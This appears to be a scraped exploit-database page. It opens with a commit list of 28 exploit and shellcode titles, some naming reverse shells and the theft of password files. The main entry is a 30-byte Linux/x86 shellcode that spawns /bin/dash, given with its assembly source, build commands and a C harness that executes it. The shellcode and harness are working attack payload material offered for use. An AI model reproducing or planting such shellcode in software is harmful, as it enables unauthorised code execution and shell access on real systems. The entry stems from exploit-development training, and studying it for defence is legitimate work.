
28 changes to exploits/shellcodes Multiple CPUs - Information Leak Using Speculative Execution Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check Jungo Windriver 12.5.1 - Privilege Escalation DiskBoss Enterprise 8.8.16 - Buffer Overflow HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit) HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit) Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit) Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure Muviko 1.1 - SQL Injection WordPress Plugin Events Calendar - 'event_id' SQL Injection WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes) BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes) BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes) BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) Linux/x86 - execve /bin/dash Shellcode (30 bytes) Alpha - /bin/sh Shellcode (80 bytes) Alpha - execve() Shellcode (112 bytes) Alpha - setuid() Shellcode (156 bytes) BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
76 lines
No EOL
1.4 KiB
C
76 lines
No EOL
1.4 KiB
C
/*
|
|
|
|
################## Description ####################
|
|
|
|
; Title : exec /bin/dash - Shellcode
|
|
; Author : Hashim Jawad
|
|
; Website : ihack4falafel[.]com
|
|
; Twitter : @ihack4falafel
|
|
; SLAE ID : SLAE-1115
|
|
; Purpose : spawn /bin/dash shell
|
|
; OS : Linux
|
|
; Arch : x86
|
|
; Size : 30 bytes
|
|
|
|
################### dash.nasm #####################
|
|
|
|
global _start
|
|
|
|
section .text
|
|
|
|
_start:
|
|
|
|
; push NULL into the stack
|
|
xor eax, eax
|
|
push eax
|
|
|
|
; push (////bin/dash) into the stack
|
|
|
|
push 0x68736164
|
|
push 0x2f6e6962
|
|
push 0x2f2f2f2f
|
|
|
|
; push ESP pointer to EBX
|
|
mov ebx, esp
|
|
|
|
; execute __NR_execve syscall
|
|
push eax
|
|
mov edx, esp
|
|
push ebx
|
|
mov ecx, esp
|
|
mov al, 0xb
|
|
int 0x80
|
|
|
|
################### dash binary #####################
|
|
|
|
nasm -f elf32 -o dash.o dash.nasm
|
|
|
|
ld -z execstack -o dash dash.o
|
|
|
|
################### Shellcode ########################
|
|
|
|
objdump -d dash -M intel
|
|
|
|
################## Compile #########################
|
|
|
|
gcc -fno-stack-protector -z execstack dash.c -o dash
|
|
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
|
|
|
|
|
|
main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |